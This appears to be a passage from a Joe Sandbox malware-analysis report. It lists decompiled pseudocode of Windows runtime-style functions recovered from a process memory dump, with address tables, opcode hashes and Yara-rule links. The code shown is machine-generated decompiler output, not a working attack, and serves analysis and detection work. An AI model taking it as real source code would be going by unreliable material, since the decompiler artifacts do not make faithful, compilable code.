				_v8 =  *0x3ccd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03BF2280(_t26, 0x3cc8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E03BEFFB0(_t41, _t51, 0x3cc8608);
						L2:
						 *0x3ccb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E03C1B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03BF2280(_t28, 0x3cc8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E03BEFFB0(_t42, _t53, 0x3cc8608);
							if(_t53 != 0) {
								L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E03BEFFB0(_t41, _t51, 0x3cc8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                                                          0x03c14a2c
                                                                                                                                          0x03c14a34
                                                                                                                                          0x03c14a3c
                                                                                                                                          0x03c14a3e
                                                                                                                                          0x03c14a48
                                                                                                                                          0x03c14a4b
                                                                                                                                          0x03c14a4d
                                                                                                                                          0x03c14a51
                                                                                                                                          0x03c14a9c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c14aa3
                                                                                                                                          0x03c14aa8
                                                                                                                                          0x03c14aad
                                                                                                                                          0x03c14ab1
                                                                                                                                          0x03c14ade
                                                                                                                                          0x03c14ae3
                                                                                                                                          0x03c14a5a
                                                                                                                                          0x03c14a62
                                                                                                                                          0x03c14a6a
                                                                                                                                          0x03c14a6e
                                                                                                                                          0x03c4f203
                                                                                                                                          0x03c14a84
                                                                                                                                          0x03c14a88
                                                                                                                                          0x03c14a89
                                                                                                                                          0x03c14a8a
                                                                                                                                          0x03c14a95
                                                                                                                                          0x03c14a95
                                                                                                                                          0x03c14a79
                                                                                                                                          0x03c14a80
                                                                                                                                          0x03c14af2
                                                                                                                                          0x03c14af4
                                                                                                                                          0x03c14af9
                                                                                                                                          0x03c14aff
                                                                                                                                          0x03c14b01
                                                                                                                                          0x03c14b03
                                                                                                                                          0x03c14b08
                                                                                                                                          0x03c4f20a
                                                                                                                                          0x03c4f212
                                                                                                                                          0x03c4f216
                                                                                                                                          0x03c4f216
                                                                                                                                          0x03c14b08
                                                                                                                                          0x03c14b13
                                                                                                                                          0x03c14b1a
                                                                                                                                          0x03c4f229
                                                                                                                                          0x03c4f229
                                                                                                                                          0x03c14b1a
                                                                                                                                          0x03c14a82
                                                                                                                                          0x00000000
                                                                                                                                          0x03c14a82
                                                                                                                                          0x03c14ab7
                                                                                                                                          0x03c14acd
                                                                                                                                          0x03c14acd
                                                                                                                                          0x03c14ad5
                                                                                                                                          0x03c14ada
                                                                                                                                          0x00000000
                                                                                                                                          0x03c14ada
                                                                                                                                          0x03c14ac2
                                                                                                                                          0x03c14acb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c14acb
                                                                                                                                          0x03c14a53
                                                                                                                                          0x03c14a53
                                                                                                                                          0x03c14a58
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 62087a945deae096e9e79ca44980c4d769fb24d9faba4483f2a2dfb4bed674c4
                                                                                                                                          • Instruction ID: 9032be63d67db4839c08f4e49cd6e9093a623f8599215fd92859163ca8d6995d
                                                                                                                                          • Opcode Fuzzy Hash: 62087a945deae096e9e79ca44980c4d769fb24d9faba4483f2a2dfb4bed674c4
                                                                                                                                          • Instruction Fuzzy Hash: 5F3123362113509FC725DF16C945B2BB7B4FB82714F0A04ADE512CF240CB70E911EB89
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C18EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E03C18EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x3ccd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03C04E70(0x3cc86e4, 0x3c19490, 0, 0);
					if( *0x3cc53e8 > 5 && E03C18F33(0x3cc53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x3cc53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x3cc53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x3bbbc46;
						_t48 = E03C57B9C(0x3cc53e8, 0x3bbbc46, _t67, 0x3cc53e8, _t70,  &_v140);
					}
				}
				return E03C1B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                                          0x03c18ec7
                                                                                                                                          0x03c18ed9
                                                                                                                                          0x03c18edc
                                                                                                                                          0x03c18ee6
                                                                                                                                          0x03c18ee9
                                                                                                                                          0x03c18eee
                                                                                                                                          0x03c18efc
                                                                                                                                          0x03c18f08
                                                                                                                                          0x03c51349
                                                                                                                                          0x03c51353
                                                                                                                                          0x03c5135d
                                                                                                                                          0x03c51366
                                                                                                                                          0x03c5136f
                                                                                                                                          0x03c51375
                                                                                                                                          0x03c5137c
                                                                                                                                          0x03c51385
                                                                                                                                          0x03c51390
                                                                                                                                          0x03c51391
                                                                                                                                          0x03c5139c
                                                                                                                                          0x03c5139d
                                                                                                                                          0x03c513a6
                                                                                                                                          0x03c513ac
                                                                                                                                          0x03c513b2
                                                                                                                                          0x03c513b5
                                                                                                                                          0x03c513bc
                                                                                                                                          0x03c513bf
                                                                                                                                          0x03c513c2
                                                                                                                                          0x03c513c5
                                                                                                                                          0x03c513c8
                                                                                                                                          0x03c513cb
                                                                                                                                          0x03c513ce
                                                                                                                                          0x03c513d1
                                                                                                                                          0x03c513d4
                                                                                                                                          0x03c513d7
                                                                                                                                          0x03c513da
                                                                                                                                          0x03c513dd
                                                                                                                                          0x03c513e0
                                                                                                                                          0x03c513e3
                                                                                                                                          0x03c513e6
                                                                                                                                          0x03c513e9
                                                                                                                                          0x03c513f6
                                                                                                                                          0x03c51400
                                                                                                                                          0x03c51400
                                                                                                                                          0x03c18f08
                                                                                                                                          0x03c18f32

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 01ae29f4dfb6186c5c21dc0a612cb81c60be2f712bd3037eacbde7fe9b7cfab0
                                                                                                                                          • Instruction ID: 2352c64f51fd04e4f6b315496e5753d46470cd16029186f1ba8ff111ea5acd14
                                                                                                                                          • Opcode Fuzzy Hash: 01ae29f4dfb6186c5c21dc0a612cb81c60be2f712bd3037eacbde7fe9b7cfab0
                                                                                                                                          • Instruction Fuzzy Hash: C041B1B5D003189EDB24CFAAD980AAEFBF4FB49310F5441AEE509E7200D7709A84DF50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0E730 Relevance: .1, Instructions: 89COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                          			E03C0E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03C19670() < 0) {
					L03C2DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3cc7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03BF4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M03C0E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                                          0x03c0e730
                                                                                                                                          0x03c0e736
                                                                                                                                          0x03c0e738
                                                                                                                                          0x03c0e73d
                                                                                                                                          0x03c0e73e
                                                                                                                                          0x03c0e740
                                                                                                                                          0x03c0e749
                                                                                                                                          0x03c0e765
                                                                                                                                          0x03c0e76a
                                                                                                                                          0x03c0e76b
                                                                                                                                          0x03c0e76c
                                                                                                                                          0x03c0e76d
                                                                                                                                          0x03c0e76e
                                                                                                                                          0x03c0e76f
                                                                                                                                          0x03c0e775
                                                                                                                                          0x03c0e777
                                                                                                                                          0x03c0e77e
                                                                                                                                          0x03c4b675
                                                                                                                                          0x03c0e784
                                                                                                                                          0x03c0e784
                                                                                                                                          0x03c0e789
                                                                                                                                          0x03c0e7a8
                                                                                                                                          0x03c0e7ac
                                                                                                                                          0x03c0e807
                                                                                                                                          0x03c0e7ae
                                                                                                                                          0x03c0e7ae
                                                                                                                                          0x03c0e7b1
                                                                                                                                          0x03c0e7b4
                                                                                                                                          0x03c0e7b9
                                                                                                                                          0x03c0e7c0
                                                                                                                                          0x03c0e7c4
                                                                                                                                          0x03c0e7ca
                                                                                                                                          0x03c0e7cc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7d3
                                                                                                                                          0x03c0e7d6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7ff
                                                                                                                                          0x03c0e802
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7f9
                                                                                                                                          0x03c0e7fc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7f3
                                                                                                                                          0x03c0e7f6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7ed
                                                                                                                                          0x03c0e7f0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7e7
                                                                                                                                          0x03c0e7ea
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b685
                                                                                                                                          0x03c4b688
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4b682
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0e7cc
                                                                                                                                          0x03c0e7d9
                                                                                                                                          0x03c0e7dc
                                                                                                                                          0x03c0e7de
                                                                                                                                          0x03c0e7de
                                                                                                                                          0x03c0e7ac
                                                                                                                                          0x03c0e7e4
                                                                                                                                          0x03c0e74b
                                                                                                                                          0x03c0e751
                                                                                                                                          0x03c0e759
                                                                                                                                          0x03c0e761
                                                                                                                                          0x03c0e761

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ce3dabd328b99ad4986d0ad4960e7311523e592f5a53872729c0abbcf86b5854
                                                                                                                                          • Instruction ID: 0942eaa74ce895887b30b8c1533d1c329dd39db531f0072bf64d05562db58ea8
                                                                                                                                          • Opcode Fuzzy Hash: ce3dabd328b99ad4986d0ad4960e7311523e592f5a53872729c0abbcf86b5854
                                                                                                                                          • Instruction Fuzzy Hash: FD318D75A54249AFD744CF29C840B9ABBE8FB09314F1486A6F904CB381D631ED80CBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0BC2C Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                          			E03C0BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3cc6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03BF2280(0xd, 0x12fdf1a0);
				_t41 =  *0x3cc60f8; // 0x0
				if(_t41 != 0) {
					 *0x3cc60f8 =  *_t41;
					 *0x3cc60fc =  *0x3cc60fc + 0xffff;
				}
				E03BEFFB0(_t41, 0x800, 0x12fdf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x3cc60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03BF4620(0x3cc6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3cc6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                                          0x03c0bc36
                                                                                                                                          0x03c0bc42
                                                                                                                                          0x03c0bc45
                                                                                                                                          0x03c0bc4a
                                                                                                                                          0x03c0bd35
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0bc50
                                                                                                                                          0x03c0bc50
                                                                                                                                          0x03c0bc58
                                                                                                                                          0x03c0bc5a
                                                                                                                                          0x03c0bc60
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4a4f2
                                                                                                                                          0x03c4a4f6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4a4fc
                                                                                                                                          0x03c0bc79
                                                                                                                                          0x03c0bc7e
                                                                                                                                          0x03c0bc86
                                                                                                                                          0x03c0bd16
                                                                                                                                          0x03c0bd20
                                                                                                                                          0x03c0bd20
                                                                                                                                          0x03c0bc8d
                                                                                                                                          0x03c0bc94
                                                                                                                                          0x03c0bcbd
                                                                                                                                          0x03c0bcca
                                                                                                                                          0x03c0bccb
                                                                                                                                          0x03c0bccc
                                                                                                                                          0x03c0bccd
                                                                                                                                          0x03c0bcce
                                                                                                                                          0x03c0bcd4
                                                                                                                                          0x03c0bcea
                                                                                                                                          0x03c0bcee
                                                                                                                                          0x03c0bcf2
                                                                                                                                          0x03c0bd00
                                                                                                                                          0x03c0bd04
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0bc96
                                                                                                                                          0x03c0bcab
                                                                                                                                          0x03c0bcaf
                                                                                                                                          0x03c0bd2c
                                                                                                                                          0x03c0bd2c
                                                                                                                                          0x03c0bd09
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0bd09
                                                                                                                                          0x03c0bcb1
                                                                                                                                          0x03c0bcb5
                                                                                                                                          0x03c0bcbb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0bcbb

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 420e01bbba38894e50bf4681d336e81b738f2423cc6b4b2cbbd2ddd69dffca2c
                                                                                                                                          • Instruction ID: 31da1991e724ddf63ad729306f7e35ead1dfe5ad73fdf534a504c73a1947b1de
                                                                                                                                          • Opcode Fuzzy Hash: 420e01bbba38894e50bf4681d336e81b738f2423cc6b4b2cbbd2ddd69dffca2c
                                                                                                                                          • Instruction Fuzzy Hash: 0B31F276A207959FCB11EF58D5807A6B3A4FF18311F0800B9ED54EF289E775DE058B90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD9100 Relevance: .1, Instructions: 87COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                          			E03BD9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x3caf6e8);
				E03C2D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E03CA88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E03C2D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x3cc86c0; // 0x34707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x3cc86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03BF2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E03CA88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E03C1AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x3ccb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x3cc84c0;
										if(_t69 >=  *0x3cc84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03CA9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E03BD922A(_t82);
							_t53 = E03BF7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03CA8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x3cc86c0; // 0x34707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x3cc86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x3cc86bc;
										_t72 = 0x3cc86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03BD9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x3cc86c4;
									_t72 = 0x3cc86c0;
									L18:
									E03C09B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                                          0x03bd9100
                                                                                                                                          0x03bd9100
                                                                                                                                          0x03bd9100
                                                                                                                                          0x03bd9100
                                                                                                                                          0x03bd9102
                                                                                                                                          0x03bd9107
                                                                                                                                          0x03bd910c
                                                                                                                                          0x03bd9110
                                                                                                                                          0x03bd9115
                                                                                                                                          0x03bd9136
                                                                                                                                          0x03bd9143
                                                                                                                                          0x03c337e4
                                                                                                                                          0x03c337e4
                                                                                                                                          0x03bd9149
                                                                                                                                          0x03bd914e
                                                                                                                                          0x03bd914e
                                                                                                                                          0x03bd9117
                                                                                                                                          0x03bd911d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd911f
                                                                                                                                          0x03bd9125
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd9151
                                                                                                                                          0x03bd9158
                                                                                                                                          0x03bd915d
                                                                                                                                          0x03bd9161
                                                                                                                                          0x03bd9168
                                                                                                                                          0x03c33715
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd916e
                                                                                                                                          0x03bd916e
                                                                                                                                          0x03bd9175
                                                                                                                                          0x03bd9177
                                                                                                                                          0x03bd917e
                                                                                                                                          0x03bd917f
                                                                                                                                          0x03bd9182
                                                                                                                                          0x03bd9182
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd9187
                                                                                                                                          0x03bd918a
                                                                                                                                          0x03bd918d
                                                                                                                                          0x03bd918f
                                                                                                                                          0x03bd9192
                                                                                                                                          0x03bd9195
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd9198
                                                                                                                                          0x03bd919a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3371f
                                                                                                                                          0x03c33721
                                                                                                                                          0x03c33727
                                                                                                                                          0x03c3372f
                                                                                                                                          0x03c33733
                                                                                                                                          0x03c33735
                                                                                                                                          0x03c33738
                                                                                                                                          0x03c3373b
                                                                                                                                          0x03c3373d
                                                                                                                                          0x03c33740
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33746
                                                                                                                                          0x03c33749
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3374f
                                                                                                                                          0x03c33751
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c33757
                                                                                                                                          0x03c33759
